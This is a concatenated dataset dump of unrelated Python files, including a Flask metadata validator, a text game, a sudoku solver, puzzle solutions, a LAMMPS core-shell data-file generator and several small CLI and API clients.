delim = '\\t'\n \n t = Table.from_csv(string_io, delimiter = delim)\n \n ##get metadata table to print on webpage\n headers = t.colnames()\n sample_num = len(t.get(t.colnames()[0]))\n rows = list(range(0, sample_num))\n\n #overall check to see if metadata satisfies all requirements\n checks = specification.check(t)\n all_msg = [msg[1].message() for msg in checks]\n print(all_msg)\n if(all(msg == 'OK' or \"Doesn't apply\" in msg for msg in all_msg)):\n flash('Your metadata is good to go!')\n else:\n flash('Your metadata still has errors!')\n\n ##create dictionaries for misformmated cell highlighting and popover text\n header_issues = {}\n highlight_missing = {}\n highlight_mismatch = {}\n highlight_repeating = {}\n highlight_not_allowed = {}\n \n ##print requirements and save the errors in the dictionarys to highlight in table\n for req, res in specification.check(t):\n if(isinstance(res, musthave.StillNeeds)):\n ##print(req.__dict__)\n ##print(res.__dict__)\n ##populate missing dictionary with empty cells\n if(res.idxs is not None):\n for row_num in res.idxs:\n for col_nam in req.colnames:\n if row_num in highlight_missing.keys():\n highlight_missing = {**highlight_missing, **{row_num: highlight_missing[row_num] + [col_nam]}}\n else:\n highlight_missing = {**highlight_missing, **{row_num: [col_nam]}}\n ##populate header dictionary for empty cell dictionary\n if len(req.colnames) == 1:\n header_issues = {**header_issues, **{req.colnames[0]: \"Empty cell\"}}\n ##populate header dictionary for unique cells between 2 or more columns\n else:\n header_issues = {**header_issues, **{req.colnames[0]: (\" + \".join(req.colnames) + \" must be filled in together\")}}\n ##populate mismatch dictionary for illegally formmated cells (e.g. containing specials characters)\n if(res.not_matching is not None and hasattr(req, \"colname\")):\n highlight_mismatch = {**highlight_mismatch, **{cells : req.colname for cells in res.not_matching}}\n header_issues = {**header_issues, **{req.colname: \"Wrong formatting\"}}\n ##populate header dictionary with column names with wrong format\n if(res.not_matching is not None and not hasattr(req, \"colname\")):\n header_issues = {**header_issues, **{col_names: \"Forbidden characters in column name\" for col_names in res.not_matching}}\n ##populate repeating dictionary with repeating cells\n if(res.repeated is not None):\n highlight_repeating = {**highlight_repeating, **{cells[0][0] : req.colnames[0] for cells in res.repeated}}\n header_issues = {**header_issues, **{req.colnames[0]: \"Repeated values\"}}\n ##populate dictionary with cells that does not hold a pre-selected option\n if(res.not_allowed is not None):\n highlight_not_allowed = {**highlight_not_allowed, **{cells : req.colname for cells in res.not_allowed}}\n header_issues = {**header_issues, **{req.colname: \"Use only allowed selections\"}}\n ##print error messages\n if res.message() != 'OK' and \"Doesn't apply\" not in res.message():\n modified_descrip = req.description()[:-1]\n for keys in regex_translate.keys():\n if keys in req.description():\n modified_descrip = modified_descrip.split('match')[0] + regex_translate[keys]\n flash(modified_descrip + \": \" + res.message())\n #print(highlight_repeating)\n return render_template('index.html', filename=filename, headers=headers, rows=rows, table=t, missing=highlight_missing, mismatch=highlight_mismatch, repeating=highlight_repeating, not_allowed=highlight_not_allowed, header_issues=header_issues)\n return redirect(request.url)\n\n@app.route('/wiki')\ndef wiki():\n 
return render_template('wiki.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"529542864","text":"#!/usr/bin/env python3\nimport random\n\n\nclass ares:\n \"\"\"defines antagonist shell\"\"\"\n def __init__(self):\n villain = [\"Viktor\", \"Konstantin\", \"Werther\", \"Ishmael\", \"Dorian\",\n \"Tyler\", \"Billy\", \"Idiot\"]\n self.name = villain[random.randint(0, len(villain)-1)]\n self.hp = random.randint(1, 3)\n self.strength = self.hp\n\n def __str__(self):\n return \"NAME:{0} HP:{1}\".format(self.name, self.hp)\n\n\nclass bro:\n \"\"\"defines protagonist shell\"\"\"\n def __init__(self, name, hp=10):\n self.name = name\n self.hp = hp\n self.pockets = []\n self.strength = 3\n\n def __str__(self):\n return \"NAME:{0} HP:{1}\".format(self.name, self.hp)\n\n\nclass a_room:\n \"\"\"defines what shall be encountered as gameplay continues\"\"\"\n def __init__(self):\n loot = [\"quarter: shiny!!\", \"chips: a healthy snack for later\",\n \"kitteh: it says 'meow'\", \"the sword of alexander: glistens\",\n \"tv remote: it's missing the mute button...\"]\n self.foes = []\n numb_foes = random.randint(1, 2)\n for x in range(numb_foes):\n self.foes.append(ares())\n if random.randint(1, 3) % 2 == 0:\n self.treasure = loot[random.randint(0, len(loot) - 1)]\n else:\n self.treasure = None\n\n\ndef intro_scene():\n return print(\"\"\"\n you are missing a shoe...\n your phone will not even light up...\n your head is throbbing...\n better go through the only door you see...\n \"\"\")\n\n\ndef outro_scene_1():\n return print(\"\"\"\n you are seeing sky blue...\n a fresh coffee is in your cup...\n you begin sobbing...\n ev'rything a rotten memory...\n \"\"\")\n","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"585590858","text":"from tests import test_base\nimport requests\n\n\nclass TestOrderCoupon(test_base.TestBase):\n path = \"/order/coupon/{order_coupon}\"\n\n def request(self):\n self.response = requests.request(\n method=\"PUT\", url=self.environment[\"host\"] + self.path.format(\n order_coupon=self.environment[\"custom_variables\"][\"order_coupon\"]), headers=self.environment[\"headers\"], data={\n })\n return self\n","sub_path":"userdata/api_test/tests/regress/test_order_coupon.py","file_name":"test_order_coupon.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437425378","text":"# board = [[0,2,0],[1,2,0],[2,2,1]]\n# moves = [1,2,2,2,1,3]\n# board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\n# moves = [1, 5, 3, 5, 1, 2, 1, 4]\nboard= [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves= [1, 5, 3, 5, 1, 2, 5, 1, 4, 3]\n\ndef solution(board, moves):\n basket = []\n answer = 0\n i =0\n\n for move in moves:\n for j in range(0, len(board)):\n if board[j][move - 1] == 0:\n continue\n else:\n basket.append(board[j][move - 1])\n board[j][move - 1] = 0\n break\n # print(basket)\n\n while True:\n if basket[i] != basket[i + 1]:\n i+=1\n if i ==len(basket)-1:\n break\n else:\n continue\n else:\n del basket[i:i + 2]\n answer += 2\n i=0\n # print(basket)\n # print(answer)\n if 
len(basket)<=1 :\n break\n\n return answer\n\n\nprint(solution(board,moves))","sub_path":"level1/크레인인형뽑기.py","file_name":"크레인인형뽑기.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483009727","text":"'''\nGiven a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing only 1's and return its area.\n'''\nclass Solution:\n def maximalRectangle(self, matrix):\n max_answer = 0\n if matrix == []:\n return 0\n len_x = len(matrix[0])\n len_y = len(matrix)\n for i in range(len_x):\n for j in range(len_y):\n if matrix[j][i] == \"1\":\n start_j = j\n start_i = i\n high_now = 0\n min_len = 100\n while matrix[start_j][start_i] == \"1\" and start_j < len_y:\n high_now += 1\n len_now = 0\n while start_i < len_x and matrix[start_j][start_i] == \"1\":\n len_now += 1\n start_i += 1\n start_i = i\n min_len = min(min_len, len_now)\n max_answer = max(high_now * min_len, max_answer)\n start_j += 1\n if start_j == len_y:\n break\n #print(max_answer)\n return max_answer\n\nnums1 = [\n [\"1\",\"0\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"0\",\"1\",\"1\",\"1\",\"1\"],\n [\"1\",\"1\",\"1\",\"1\",\"1\",\"1\"],\n [\"1\",\"0\",\"0\",\"1\",\"0\",\"0\"]\n]\nfunction = Solution()\nfunction.maximalRectangle(nums1)","sub_path":"Array/problem85/maximal_rectangle.py","file_name":"maximal_rectangle.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"236047235","text":"#\n# Copyright (C) 2015 Satoru SATOH \n# License: MIT\n#\n\"\"\"\nCLI frontend for various template engines.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport optparse # argparse is not available in python 2.6 standard lib.\nimport sys\n\nimport anytemplate.api\nimport anytemplate.globals\nimport anytemplate.utils\n\n\nLOGGER = anytemplate.globals.LOGGER\n\n\ndef option_parser():\n \"\"\"\n :return: Option parsing object :: optparse.OptionParser\n \"\"\"\n defaults = dict(template_paths=[], contexts=[], schema=None, output='-',\n engine=None, list_engines=False, verbose=1)\n\n psr = optparse.OptionParser(\"%prog [OPTION ...] TEMPLATE_FILE\")\n psr.set_defaults(**defaults)\n\n psr.add_option(\"-T\", \"--template-path\", action=\"append\",\n dest=\"template_paths\",\n help=\"Template search path can be specified multiple \"\n \"times. Note: Dir in which given template exists is \"\n \"always included in the search paths (at the end of \"\n \"the path list) regardless of this option. \")\n psr.add_option(\"-C\", \"--context\", action=\"append\", dest=\"contexts\",\n help=\"Specify file path and optionally its filetype, to \"\n \"provides context data to instantiate templates. \"\n \" The option argument's format is \"\n \" [type:]\"\n \" ex. 
-C json:common.json -C ./specific.yaml -C \"\n \"yaml:test.dat, -C yaml:/etc/foo.d/*.conf\")\n psr.add_option(\"-s\", \"--schema\",\n help=\"JSON schema file in any formats anyconfig supports, \"\n \"to validate context files\")\n psr.add_option(\"-E\", \"--engine\",\n help=\"Specify template engine name such as 'jinja2'\")\n psr.add_option(\"-L\", \"--list-engines\", action=\"store_true\",\n help=\"List supported template engines in your environment\")\n psr.add_option(\"-o\", \"--output\", help=\"Output filename [stdout]\")\n psr.add_option(\"-v\", \"--verbose\", action=\"store_const\", const=0,\n help=\"Verbose mode\")\n psr.add_option(\"-q\", \"--quiet\", action=\"store_const\", const=2,\n dest=\"verbose\", help=\"Quiet mode\")\n return psr\n\n\ndef get_loglevel(level):\n \"\"\"\n Set log level.\n\n >>> assert get_loglevel(2) == logging.WARN\n >>> assert get_loglevel(10) == logging.INFO\n \"\"\"\n try:\n return [logging.DEBUG, logging.INFO, logging.WARN][level]\n except IndexError:\n return logging.INFO\n\n\ndef main(argv=None):\n \"\"\"\n Entrypoint.\n \"\"\"\n if argv is None:\n argv = sys.argv\n\n psr = option_parser()\n (options, args) = psr.parse_args(argv[1:])\n\n if not args and not options.list_engines:\n psr.print_help()\n sys.exit(0)\n\n LOGGER.setLevel(get_loglevel(options.verbose))\n\n if options.list_engines:\n ecs = anytemplate.api.list_engines()\n print(\", \".join(\"%s (%s)\" % (e.name(), e.priority()) for e in ecs))\n return\n\n tmpl = args[0]\n ctx = anytemplate.utils.parse_and_load_contexts(options.contexts,\n options.schema)\n anytemplate.api.render_to(tmpl, ctx, options.output,\n at_paths=options.template_paths,\n at_engine=options.engine, at_ask_missing=True)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n# vim:sw=4:ts=4:et:\n","sub_path":"anytemplate/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370889229","text":"from __future__ import print_function\nimport pickle\nimport os.path\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport requests\n\n\ndef google_auth_login():\n SCOPES = ['https://www.googleapis.com/auth/userinfo.profile https://www.googleapis.com/auth/userinfo.email']\n os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'\n\n credentials = None\n filename = 'google-auth-credentials.json'\n\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n\n try:\n if not credentials or not credentials.valid:\n if credentials and credentials.expired and credentials.refresh_token:\n credentials.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(filename, SCOPES)\n credentials = flow.run_local_server(port=0)\n\n # with open('token.pickle', 'wb') as token:\n # pickle.dump(credentials, token)\n\n url = 'https://www.googleapis.com/oauth2/v1/userinfo?alt=json&access_token=' + credentials.token\n data = requests.get(url).json()\n return True, (data['family_name'], data['given_name'], data['email'])\n except:\n return False, ()\n","sub_path":"buy-some-food-tema3/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"240189761","text":"import itertools\nfrom utils import *\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in 
cols]\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\n\n# TODO: Update the unit list to add the new diagonal units\ndiagonal_units = [['A1', 'B2', 'C3', 'D4', 'E5', 'F6', 'G7', 'H8', 'I9'], ['A9', 'B8', 'C7', 'D6', 'E5', 'F4', 'G3', 'H2', 'I1']]\nunitlist = unitlist + diagonal_units\n\n# Must be called after all units (including diagonals) are added to the unitlist\nunits = extract_units(unitlist, boxes)\npeers = extract_peers(units, boxes)\n\n \ndef naked_twins(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n \n Returns\n -------\n dict\n The values dictionary with the naked twins eliminated from peers\n \"\"\"\n for unit in unitlist:\n pairs = [box for box in unit if len(values[box]) == 2]\n possible_twins = [list(pair) for pair in itertools.combinations(pairs, 2)]\n for pair in possible_twins:\n box1 = pair[0]\n box2 = pair[1]\n if values[box1] == values[box2]:\n for box in unit:\n if box != box1 and box != box2:\n for digit in values[box1]:\n values[box] = values[box].replace(digit, '')\n\n return values\n \n\ndef eliminate(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the assigned values eliminated from peers\n \"\"\"\n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n for box in solved_values: \n digit = values[box]\n for peer in peers[box]:\n values[peer] = values[peer].replace(digit, '')\n return values\n\n\ndef only_choice(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with all single-valued boxes assigned\n \"\"\"\n for unit in unitlist:\n for digit in '123456789':\n x = [box for box in unit if digit in values[box]]\n if len(x) == 1:\n values[x[0]] = digit\n return values\n\n\ndef reduce_puzzle(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n Returns\n -------\n dict or False\n \"\"\" \n solved = False\n while not solved:\n solved_values_before = [box for box in values.keys() if len(values[box]) == 1]\n values = eliminate(values)\n values = only_choice(values)\n values = naked_twins(values)\n solved_values_after = [box for box in values.keys() if len(values[box]) == 1]\n solved = solved_values_before == solved_values_after\n if len([box for box in values.keys() if len(values[box]) == 0]):\n return False\n return values\n \n\ndef search(values):\n \"\"\"\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n Returns\n -------\n dict or False\n The values dictionary with all boxes assigned or False\n \"\"\"\n values = reduce_puzzle(values)\n if values == False:\n return False\n\n if all(len(values[s]) == 1 for s in boxes):\n return values ## Solved!\n\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n for value in values[s]:\n new_sudoku = values.copy()\n new_sudoku[s] = value\n attempt = search(new_sudoku)\n if attempt:\n return attempt\n \n\ndef solve(grid):\n \"\"\"\n Parameters\n ----------\n grid(string)\n a string representing a sudoku grid.\n Ex. 
'2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n Returns\n -------\n dict or False\n \"\"\"\n values = grid2values(grid)\n values = search(values)\n return values\n\n\nif __name__ == \"__main__\":\n diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n display(grid2values(diag_sudoku_grid))\n result = solve(diag_sudoku_grid)\n display(result)\n\n try:\n import PySudoku\n PySudoku.play(grid2values(diag_sudoku_grid), result, history)\n\n except SystemExit:\n pass\n except:\n print('We could not visualize your board due to a pygame issue. Not a problem! It is not a requirement.')\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"340934211","text":"import math\nfrom random import shuffle\nimport sys\nimport logo\n\ndef main():\n cs()\n \ndef cs():\n print('\\nData file for core-shell type potential.\\n')\n CF = input('Chemical Formula: ')\n first_line = 'Coreshell: '+CF+'\\n\\n'\n\n cs_nat = int(input('Number of CS atom types?: '))\n cs_symb=[]\n cs_mass=[]\n cs_charge=[]\n cs_n=[]\n cs_m=[]\n cs_fn=[]\n for i in range(0,int(cs_nat)):\n s = input('Symbol for '+str(i+1)+'-CS atom: ')\n cs_symb.append(s)\n m1 = input('Mass for core of '+s+' atom: ')\n m2 = input('Mass for shell of '+s+' atom: ')\n c1 = input('Charge for core of '+s+' atom: ')\n c2 = input('Charge for shell of '+s+' atom: ')\n cs_mass.append([m1,m2])\n cs_charge.append([c1,c2])\n cn = input('Atom number for core of '+s+': ')\n sn = input('Atom number for shell of '+s+': ')\n cs_n.append([cn,sn])\n n = input('Molecule number of '+s+': ')\n cs_m.append(n)\n n = input('Number of atoms for '+s+' in complete formula: ')\n cs_fn.append(int(n))\n\n ncs_nat = int(input('Number of non-CS atom types?: '))\n ncs_symb=[]\n ncs_mass=[]\n ncs_charge=[]\n ncs_n=[]\n ncs_m=[]\n ncs_fn=[]\n for i in range(0,int(ncs_nat)):\n s = input('Symbol for '+str(i+1)+'-non-CS atom: ')\n ncs_symb.append(s)\n m1 = input('Mass of '+s+' atom: ')\n c1 = input('Charge of '+s+' atom: ')\n ncs_mass.append(m1)\n ncs_charge.append(c1)\n n = input('Atom number of '+s+': ')\n ncs_n.append(n)\n n = input('Molecule number of '+s+': ')\n ncs_m.append(n)\n n = input('Number of atoms for '+s+' in complete formula: ')\n ncs_fn.append(int(n))\n\n nr = int(input('Number of replications of base formula: '))\n num_str = str(int(nr)*(2*sum(cs_fn)+sum(ncs_fn)))+' atoms\\n'+str(int(nr)*sum(cs_fn))+' bonds\\n0 angles\\n0 dihedrals\\n\\n' \n typ_str = str(2*cs_nat+ncs_nat)+' atoms types\\n'+str(cs_nat)+' bonds types \\n0 angles types\\n0 dihedrals types\\n\\n' \n\n\n #add_masses\n ad_mass = 'Masses\\n\\n'\n str4=''\n for ind,i in enumerate(cs_n):\n str4 += i[0]+'\\t'+cs_mass[ind][0]+'\\n'\n str4 += i[1]+'\\t'+cs_mass[ind][1]+'\\n'\n for ind,i in enumerate(ncs_n):\n str4 += i+'\\t'+ncs_mass[ind]+'\\n'\n \n\n\n\n #add_atoms\n ad_atoms = '\\nAtoms\\n\\n'\n total_cs_atoms = nr*cs_fn\n total_ncs_atoms = nr*ncs_fn\n total = sum(total_cs_atoms) + sum(total_ncs_atoms) \n exp_bl = 1.6\n\n side = int(math.pow(total,1/3)+1)\n\n coords=[]\n for i in range(side):\n for j in range(side):\n for k in range(side):\n coords.append([str(exp_bl*k),str(exp_bl*j),str(exp_bl*i)]) \n\n\n # bounding box: per-axis min/max over all generated coordinates, padded by 0.1\n xs = [float(c[0]) for c in coords]\n ys = [float(c[1]) for c in coords]\n zs = [float(c[2]) for c in coords]\n xyz=[min(xs)-0.1,max(xs)+0.1,\n min(ys)-0.1,max(ys)+0.1,\n min(zs)-0.1,max(zs)+0.1]\n 
s=['xlo','xhi','ylo','yhi','zlo','zhi']\n dim_str = str(xyz[0])+' '+str(xyz[1])+' '+'xlo xhi\\n'+str(xyz[2])+' '+str(xyz[3])+' '+'ylo yhi\\n'+str(xyz[4])+' '+str(xyz[5])+' '+'zlo zhi\\n\\n'\n\n\n ind1 = [i for i in range(total)]\n shuffle(ind1)\n shift=0\n bshift=1\n str5=''\n str3=''\n str1=''\n for i in range(nr):\n for ind,atoms in enumerate(cs_fn):\n for j in range(atoms):\n str1 += (str(2*shift+1)+'\\t'+cs_m[ind]+'\\t'+cs_n[ind][0]+'\\t'+cs_charge[ind][0]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n str1 += (str(2*shift+2)+'\\t'+cs_m[ind]+'\\t'+cs_n[ind][1]+'\\t'+cs_charge[ind][1]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n str3 += (str(bshift)+'\\t'+str(ind+1)+'\\t'+str(2*shift+1)+'\\t'+str(2*shift+2)+'\\n') \n str5 += (str(2*shift+1)+'\\t'+str(shift+1)+'\\n'+\n str(2*shift+2)+'\\t'+str(shift+1)+'\\n')\n shift += 1\n bshift += 1\n str2=''\n nshift = 1*shift\n for i in range(nr):\n for ind,atoms in enumerate(ncs_fn):\n for j in range(atoms):\n str2 += (str(nshift+shift+1)+'\\t'+ncs_m[ind]+'\\t'+ncs_n[ind]+'\\t'+ncs_charge[ind]+'\\t'+coords[ind1[shift]][0]+'\\t'+coords[ind1[shift]][1]+'\\t'+coords[ind1[shift]][2]+'\\n')\n shift += 1\n\n\n #add_bond\n ad_bonds = '\\nBonds\\n\\n'\n #str3\n\n #add_info\n ad_info = '\\nCS-info\\n\\n'\n #str5\n\n\n\n all_data = first_line+num_str+typ_str+dim_str+ad_mass+str4+ad_atoms+str1+str2+ad_bonds+str3+ad_info+str5\n\n f = open('./CS_datafile','w+')\n f.write(all_data)\n f.close()\n print('\\n\\n'+'\\033[91m'+'\\033[1m'+'Data stored in CS_datafile.'+'\\033[0m'+'\\n\\n')\n\n\n logo.print_logo()\n \n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\": main()\n\n","sub_path":"python_packages/lmps/data_file/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"601760590","text":"import numpy as np\n\n\ndef re_mutation_crossover(population_size, target, cross_over_prob, singular_values_selected, mut, j):\n \n \"\"\"\n \n This module will cover the mutation and crossover stages of fNRAND1.\n \n Note that, due to mutation and crossover, the trial vector \n may fall outside the design space.\n np.clip is used to bring it back into that space.\n \n Input : as mentioned above.\n Output : trial vector.\n\n \"\"\"\n \n # Mutation\n ind_vector = [idx for idx in range(population_size) if idx != j] # check to make sure that own index is not\n # selected\n\n vector = []\n for n in ind_vector:\n ind_sum = np.sum((target[j] - target[n]) ** 2)\n vector.append(ind_sum)\n ind = np.argmin(vector)\n\n a = target[ind]\n\n inter_med = np.random.choice(ind_vector, 2,\n replace=False) # only two position vectors are selected at random here\n\n b = target[inter_med[0]]\n c = target[inter_med[1]]\n\n mutant = a + mut * (b - c)\n\n # Cross-over\n cross_points = np.random.rand(singular_values_selected) < cross_over_prob # result in boolean values\n \n if not np.any(cross_points): # check for false value\n cross_points[\n np.random.randint(0, singular_values_selected)] = True # Forcing at least one index to become true.\n \n trial = np.where(cross_points, mutant, target[j]) # trial vector generator\n \n\n with open('optimizer_input/design_range.csv') as f:\n data = np.loadtxt(f)\n design_space = data[0: singular_values_selected].T\n\n negative_limit = design_space[0]\n positive_limit = design_space[1]\n 
\n trial = np.clip(trial, negative_limit, positive_limit) # This will clip the values to boundary value in given design space.\n\n return trial\n","sub_path":"Project_code_fNRAND1/re_mut_cross.py","file_name":"re_mut_cross.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"420453808","text":"import json\n\nimport click\nimport requests\n\n\nHOST = '0.0.0.0'\nPORT = '8000'\nBASE_URL = 'http://{}:{}/datasets/'.format(HOST, PORT)\n\n@click.group()\ndef cli():\n \"\"\"\n Command line client group for API endpoints\n \"\"\"\n\n@cli.command('import')\n@click.option('-f',\n '--file',\n required=True,\n prompt=False,\n type=click.Path(exists=True, readable=True),\n help='Dataset file path')\n@click.option('-t',\n '--title',\n required=True,\n prompt=False,\n type=str,\n help='Dataset title')\ndef add_dataset(file, title):\n \"\"\"\n Create endpoint (import dataset)\n \"\"\"\n data = { 'title': title }\n files = {'csv_data': open(file, 'rb')}\n response = requests.post(BASE_URL, data=data, files=files)\n if str(response.status_code)[:2] == '20':\n print('ID of the new dataset: {}'.format(response.json()['id']))\n else:\n click.echo('Status code: {} Cannot add requested dataset'.format(response.status_code))\n\n@cli.command('delete')\n@click.option('--id',\n prompt=False,\n type=int,\n help='Dataset ID to be deleted')\ndef delete_dataset(id):\n \"\"\"\n Delete endpoint (delete dataset)\n \"\"\"\n request_url = BASE_URL + str(id)\n response = requests.delete(request_url)\n if str(response.status_code)[:2] == '20':\n print('ID of the deleted dataset: {}'.format(id))\n else:\n click.echo('Status code: {} Cannot delete requested dataset'.format(response.status_code))\n\n@cli.command('export')\n@click.option('--id',\n prompt=False,\n type=int,\n help='Dataset ID to be exported')\n@click.option('-a',\n '--action',\n prompt=False,\n type=str,\n help='Type of export: plot, stats, excel')\ndef export_dataset(id, action):\n \"\"\"\n Retrieve endpoint (based on actions)\n \"\"\"\n if action is None:\n export_dataset(id)\n elif action == 'plot':\n export_plot(id)\n elif action == 'stats':\n export_stats(id)\n elif action == 'excel':\n export_excel(id)\n\ndef export_dataset(id):\n request_url = BASE_URL + str(id)\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n click.echo(response.json())\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_plot(id):\n request_url = BASE_URL + '{}/plot'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n filename = 'plot_{}.pdf'.format(id)\n with open(filename, 'wb') as f:\n f.write(response.content)\n click.echo('Plot for dataset id {} has been downloaded'.format(id))\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_stats(id):\n request_url = BASE_URL + '{}/stats'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n click.echo(response.json())\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\ndef export_excel(id):\n request_url = BASE_URL + '{}/excel'.format(str(id))\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n filename = 'excel_{}.xlsx'.format(id)\n with open(filename, 'wb') as f:\n f.write(response.content)\n click.echo('Excel for dataset id {} has been 
downloaded'.format(id))\n else:\n click.echo('Status code: {} Cannot access dataset'.format(response.status_code))\n\n@cli.command('ls')\ndef list_all_datasets():\n \"\"\"\n Retrieve endpoint (list all datasets)\n \"\"\"\n request_url = BASE_URL\n response = requests.get(request_url)\n if str(response.status_code)[:2] == '20':\n for dataset in response.json():\n del dataset['dataframe']\n click.echo(dataset)\n else:\n click.echo('Status code: {} Cannot access dataset list'.format(response.status_code))\n","sub_path":"cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"153817259","text":"# Import all the things\nimport pandas as pd\nimport requests\nimport os \n\n# Retreive data from Redash - checkout steps completed by each trainee\n# Remove trainees who had anything happen before 2019-01-01 as we were not \n# systematically tracking this back then\n\napi_key295 = os.environ['REDASH_KEY_QUERY295']\n\ncheckout_progress_url = \"http://redash.carpentries.org/api/queries/295/results.json?api_key=\" + api_key295\n\nr = requests.get(checkout_progress_url)\ncheckout = r.json()['query_result']['data']['rows']\ncheckout = pd.DataFrame(checkout)\ncheckout['completed'] = True\ncheckout_old = checkout[checkout['date'] < \"2019-01-01\"]['trainee_id']\ncheckout = checkout[checkout['date'] > \"2019-01-01\"]\ncheckout=checkout[~checkout['trainee_id'].isin(checkout_old)]\n\n# \"Widen\" the checkout progress table\n# This creates one row for each trainee.\ncheckout_wide = checkout.pivot_table(index='trainee_id', columns = 'requirement', values=\"completed\").reset_index()\ncheckout_wide.fillna(False, inplace=True)\n\n# Drop rows where `Training == False`. These are likely cases where data was incorrectly entered or carryovers from old systems.\n\ncheckout_wide = checkout_wide[checkout_wide['Training'] == True]\n\n# Combine the demo and homework columns as lesson program doesn't matter\n# This \"adds\" the true/false values, to return a 1 (true value)\n\ncheckout_wide[\"Demo\"] = checkout_wide[['SWC Demo', 'DC Demo', 'LC Demo']].any(axis = \"columns\")\ncheckout_wide[\"Homework\"] = checkout_wide[['SWC Homework', 'DC Homework', 'LC Homework']].any(axis = \"columns\")\n\n## Re-order the columns so the necessary ones are at the end.\n\ncheckout_wide = checkout_wide[[ 'DC Demo',\n 'DC Homework',\n 'LC Demo',\n 'LC Homework',\n 'SWC Demo',\n 'SWC Homework',\n 'trainee_id',\n 'Training',\n 'Discussion',\n 'Homework',\n 'Demo']]\n\n# Get just the last columns (`'trainee_id','Training', 'Discussion', 'Homework', 'Demo'`). 
